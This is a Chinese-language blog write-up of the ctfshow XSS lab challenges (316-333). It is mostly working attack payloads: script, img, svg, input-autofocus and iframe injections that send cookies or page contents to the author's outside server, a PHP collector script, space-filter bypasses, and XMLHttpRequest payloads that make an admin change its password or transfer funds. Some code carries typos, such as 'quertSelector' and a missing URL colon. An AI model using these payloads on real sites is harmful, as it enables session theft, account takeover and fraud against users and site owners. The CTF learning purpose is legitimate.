CTFSHOW-XSS

说来惭愧，很久没发博客了，主要是寒假有点摆了，然后ctfshow很多类型我在同时刷，这几天比如sql，xxe，php反序列化,jwt这些我就陆陆续续地能发出来了。

文末有参考WP，这两篇WP对于没学过JS的我做题用处很大，先谢过Y4师傅和bfeng师傅了!!!

316-319.

首先在自己的服务器写下接收信息的脚本：

<?php
$content=$_GET[1];
if(isset($content))
{
file_put_contents("1.txt",$content);}
else
{echo "no data input";
}
?> 

或者用nc监听本地端口，但是我的服务器之前调配置有点调崩了，等我把XXS和XXE做完重置一下再弄。

然后就是对文案的操作，后台会有bot点击链接。

收集了一些姿势：

​
​
<script>document.location.href="http//byname6.com/fk/1.php?1="+document.cookie</script>
#点击重定向
​
<script>img=document.createElement("img");img.src="http://byname6.com/fk/1.php?1="+document.cookie</script>
#图片重定向
​
<script>window.open('http://byname6.com/fk/1.php?1=')+document.cookie</script>
#window.open---浏览器打开新窗口并访问链接
​
<script>window.location.href="http://byname6.com/fk/1.php?1="+document.cookie</script>
#window可以不加
​
<input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)" autofocus>
input表单里增加了js的onfocus事件，当输入框被聚焦(鼠标点击出现的一闪一闪的光标)，就会访问目标链接，而后面增加了个autofocus属性，即自动聚焦到输入框，所以这个不需要用户点击就能xss。
​
<svg οnlοad="window.open('http://byname6.com/fk/1.php?1='+document.cookie)">
svg标签是可放缩矢量标签，onload属性是加载时触发事件。
​
<iframe οnlοad="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"> </iframe>
iframe是内联文档标签
​
<body οnlοad="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"> </body>

320-326.过滤空格(逗号还有其它标签)

用/代替空格

input/οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"/autofocus

或者

<input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)" autofocus>

在空格出填充 %09(制表符) 的URL解码--->可以复制

或者用/**/

input/**/οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"/**/autofocus

运气真好，一把梭了。。。

327.存储型开始

写祝福变成发邮件了，send要选admin，然后无脑用

<input/οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.cookie)"/autofocus>

328.登录存储窃取cookie

注册时把密码或者用户名改成上面的XSS语句，然后可以发现窃取到了管理员的COOKIE，再将PHPSESSID换成管理员的去到用户管理窗口即可得到flag。

329.cookie失效，转发页面

按上一题的来做还是无法看到flag，因为设置了每当cookie发出该cookie就会失效，所以我们的VPS接收到的东西应该是管理员能拿到的网页内容(flag)，而不是管理员的cookie。

这里有两种写法(参考的文末的两篇WP)

1.document.getElementByClassName

第一种比较简单，直接根据类名来找，比如flag藏在第一排，我们就在getElementsByClassName写入第一排密码的类名layui-table-cell laytable-cell-1-0-1，且这是第一个出现的类名，就加上[1]。

innerHTML是不包括HTML标签

outerHTML是不包括HTML标签

<input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML )" autofocus>

2.document.quertSelector()

利用到了XSS选择器quertSelector()

<input οnfοcus="window.open('http://byname6.com/fk/1.php?1='+document.quertSelector(#top>div.layui-container>div:  nth-child(4)>div>div.layui-table-box>layui-table-body layui-table-main).text" autofocus>

330.让admin修改自己的密码

很有意思的一道题，当我们像上一题一样做的时候，发现返回的是一堆星号。

发现有个新的修改密码的功能，抓个包发现访问的是/api/change.php?p=这个url，于是想到可以让管理员密码修改成我们自定义的密码：

<script>window.open("127.0.0.1/api/change.php?p=byname")</script>

然后登录账号为admin，密码为byname即可拿flag

注意一定要是127.0.0.1。

331.post版330

也没什么好说的，只是要去看看js的基本语法：

<input οnfοcus="var request=new XMLHttpRequest(); request.open('POST', 'http://127.0.0.1/api/change.php', true); request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); request.send('p=byname');" autofocus>

332-333.转账

一道很好玩的题，可以看到购买flag需要9999，我们只有4元，又看到有个转账窗口，抓包发现是post请求，那么思路就来了，让管理员post请求转账链接，给我们转9999：

这道题似乎某年的极客大挑战上也有

<input οnfοcus="var request=new XMLHttpRequest();request.open('POST','http://127.0.0.1/api/amount.php',true);request.setRequestHeader('content-type','application/x-www-form-urlencoded');request.send('u=byname&a=9999')" autofocus>

参考WP

bfeng师傅：CTFshow-WEB入门-XSS_ctfshow web入门xss-CSDN博客

Y4师傅：[CTFSHOW]XSS入门(佛系记录)_ctfshow web317-CSDN博客